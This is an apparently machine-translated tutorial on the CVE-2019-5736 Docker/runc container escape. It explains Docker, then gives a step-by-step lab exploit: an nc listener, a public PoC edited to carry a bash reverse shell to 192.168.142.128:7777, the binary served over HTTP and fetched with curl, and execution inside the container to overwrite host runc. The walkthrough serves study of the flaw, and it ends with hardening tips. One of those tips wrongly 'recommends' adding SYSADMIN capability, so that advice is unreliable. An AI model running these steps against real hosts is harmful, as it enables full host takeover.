CVE-2019-5736 Docker Escape
What is Docker?
Docker is an open source application container engine that allows developers to package their applications and dependencies into a portable container, and then publish it to any popular Linux or Windows operating system machine. Virtualization, container It is completely using the sandbox mechanism, there will be no interface between each other
What is the difference between the Docker environment and the normal production environment? For example, in an ordinary production environment, the code products written by our programmers can run in the development environment, but in the test environment, it is easy to have various bugs and error reports. This is because the machines in the two environments The configuration and environment are different
The emergence of Docker solves the problem of this difference
To give an example, when we are working on a development project, we need to configure a lot of environmental dependencies, and when we need to migrate the project to other hosts or platforms, do we also need to configure a lot of configurations? Environmental dependencies are also migrated, which is quite troublesome
Like we usually do in the production environment, we will do clustering and load balancing to let multiple servers share a responsibility and share the pressure of access traffic. When we deploy a server, you need more identical ones. Server, what should you do at this time? Will it be very troublesome to reinstall the environment dependencies from beginning to end?
So in the final analysis, two problems are highlighted, one is the problem of environment consistency, and the other is the problem of repeated configuration and waste of time, so the emergence of Docker solves these two problems
You can understand Docker as a mirror, when we need to configure the same project environment on other servers
Using Docker is equivalent to copying an environment in the past, which greatly solves the problem of environmental differences caused by the hardware environment and the need to repeatedly configure the environment
So is the concept of our Docker somewhat the same as a virtual machine? So what is the difference between Docker and a virtual machine?
Comparison of virtual machines and Docker:
| characteristic | virtual machine | container |
|---|---|---|
| start up | minute level | second level |
| Deployment creation speed | slow | quick |
| Hard disk usage | Generally GB | Usually MB |
| performance | Weaker than the native system, interacting with the monitor | Close to the native system, interact with the kernel |
| resource utilization | Generally dozens | A single machine supports thousands of containers |
| isolation | System-level isolation, stronger | Isolation between processes, weak |
| safety | powerful | weak |
History of container technology development:
Docker usage scenarios:
1. Realize rapid deployment (mirroring), for example: vulhub.org
2. Solve the problem of environment consistency, for example: deploy applications
3, improve server utilization and reduce costs, for example: install services
4, isolate different applications
The composition of Docker
Docker composition:
Core idea:
- Mirror image: packaged application environment, template, cannot be modified, columns: Nginx, Tomcat, MySQL, Taobao Mall, Ubuntu image
- Container: mirror image + read-write layer, stateful: run, pause, stop
- Warehouse Registry: store various images, provide upload and download, official warehouse: https://hub.docker.com
Reproduction environment construction instructions
What is Docker escape?
The Docker container is equivalent to a small Linux operating system, with its own disk, network, process, and user system, and Docker escape is the process by which we obtain the root authority of the host from the Docker authority. Simply put, it is obtained from the Docker authority to deploy Docker Environment's host permissions
Docker escape reason type
1. Caused by operating system kernel vulnerabilities: CVE-2016-5195 (Dirty Cow)
2. Caused by Docker’s own vulnerabilities: CVE-2019-5736, CVE-2019-14271
3. Caused by improper configuration and use of Docker
(1) Enable privileged (privileged mode)
(2) Host directory mount (file mount)
(3) Docket remote api unauthorized access leads to escape
Reference link: Analysis of multiple escape methods of docker
CVE-2019-5736 environment construction
Vulnerability conditions:
root run Docker
Docker Version < 18.09.2
runc version <= 1.0-rc6
Off-the-shelf target drone download
Link: https://pan.baidu.com/s/19uXXlyAUUJLX4wJcwEAUgw?pwd=8888
target machine Password: 123456 Both accounts are
Docker escape demo
Reproduce the environment
| machine name | IP |
|---|---|
| kali | 192.168.142.128 |
| hundreds | 192.168.142.166 |
The Kali machine starts monitoring
nc -lvnp 7777
Target machine view version
docker -v
docker-runc -v
Start the Docker service (this step requires entering the password 123456)
service docker start
run a container
docker run -it ubuntu:18.04 "/bin/bash"
Download and compile the exploit script
git clone https://github.com/Frichetten/CVE-2019-5736-PoC
cd /home/kali/桌面/CVE-2019-5736-PoC-master
Edit POC file
vim main.go
Add the command of reverse shell
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/192.168.142.128/7777 0>&1" + shellCmd
Modify the script Compile the script
First install the go compilation environment
yum install epel-release
yum install golang
compile poc
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
Kali machine opens HTTP service
python -m http.server 7987
centos machine download poc
curl -O http://192.168.142.128/main
As shown in the figure, we have successfully uploaded the Poc file to the Docker host
Then, since what we want to do is container escape, the POC needs to run in the container environment, so we need to copy the main.go file to the Docker environment
view container
docker container ls -a
Start the container
docker start 501c
container copy poc
docker cp ./main 501c:/home
Enter Docker bash
docker exec -it 501c /bin/sh
cd /home
ls
Execute poc in the container
chmod 777 main
./main
Centos enters Docker again as root
docker exec -it 501c /bin/bash
The docker container executes the reverse shell command
The kali machine receives the listening session
Principle analysis
After runc exec is added to the namespace of the container (runc operating principle), the process in the container can already observe it through the internal /proc (virtual file system). At this time, if you open /proc/[runc-PID]/exe and write By entering some content, the runc binary program on the host can be overwritten.
The next time the user calls runc to execute a command, the instruction placed by the attacker will actually be executed.
Summary: The runc file of the system is tampered with, and malicious code is added to it, which will cause the malicious code to execute in the next run exec
Docker security hardening
Docker security detection
Automated Exploitation Tools:https://github.com/cdk-team/CDK
This tool can detect some vulnerabilities in Docker containers and K8S clusters
Docker Hardening Recommendations
1. Upgrade Docker to the latest version
2. Upgrade the Linux kernel
3. It is not recommended to run Docker services with root privileges
4. It is not recommended to start Docker in privileged mode
5. It is not recommended to mount the host directory to the container directory
6. It is recommended to start the container with –cap-add=SYSADMIN, SYSADMIN means that the container process allows a series of system management operations such as mount and umount, and there is a risk of container escape
References:https://mp.weixin.qq.com/s/R5DV0X3QpYmaxVxIexRYgA